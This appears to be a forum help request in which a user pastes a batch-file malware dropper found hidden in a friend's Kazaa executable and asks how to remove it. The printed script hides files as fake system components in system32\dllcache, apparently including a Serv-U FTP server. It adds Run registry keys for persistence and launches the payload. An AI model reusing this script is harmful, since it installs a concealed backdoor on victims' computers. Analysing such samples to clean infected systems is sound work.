Hey,
Just been to a friends house to clean up his comp when after running adaware and removing 308 spy/adware applications![]()
I found this in a bat file hidden in his auto executing kazaa exe file.
After laughing and telling him he has been rooted...he responded with 'iv been what now'Code:@echo off mkdir %SystemRoot%\system32\dllcache\I386 mkdir %systemroot%\system32\dllcache\I386\pax copy svchost.exe %SystemRoot%\system32\dllcache copy cygwin1.dll %SystemRoot%\system32\dllcache copy TzoLibr.dll %SystemRoot%\system32\dllcache copy libeay32.dll %SystemRoot%\system32\dllcache copy SPOOLSVC.exe %SystemRoot%\system32\dllcache copy ServUDaemon.ini %SystemRoot%\system32\dllcache copy ogm.dll %SystemRoot%\system32\dllcache\I386\pax del svchost.exe del cygwin1.dll del ogm.dll del SPOOLSVC.exe del TzoLibr.dll del libeay32.dll del ServUDaemon.ini reg add "hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v System /t REG_SZ /d "%SystemRoot%\system32\dllcache\svchost.exe -b %SystemRoot%\system32\dllcache\I386\pax\ogm.dll" /f reg add "hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v SystemData /t REG_SZ /d "%SystemRoot%\system32\dllcache\SPOOLSVC.exe" /f call klr247.exe del ogm.bat cd %SystemRoot%\system32\dllcache SPOOLSVC.exe
I have found all the files it copied aswell as the directory and the registry keys and just wanted to know if its ok to just delete it all. Is there anyting else hidden in here that requires special attention???
Thanks.


LinkBack URL
About LinkBacks

Reply With Quote


would allow him to replace the files.
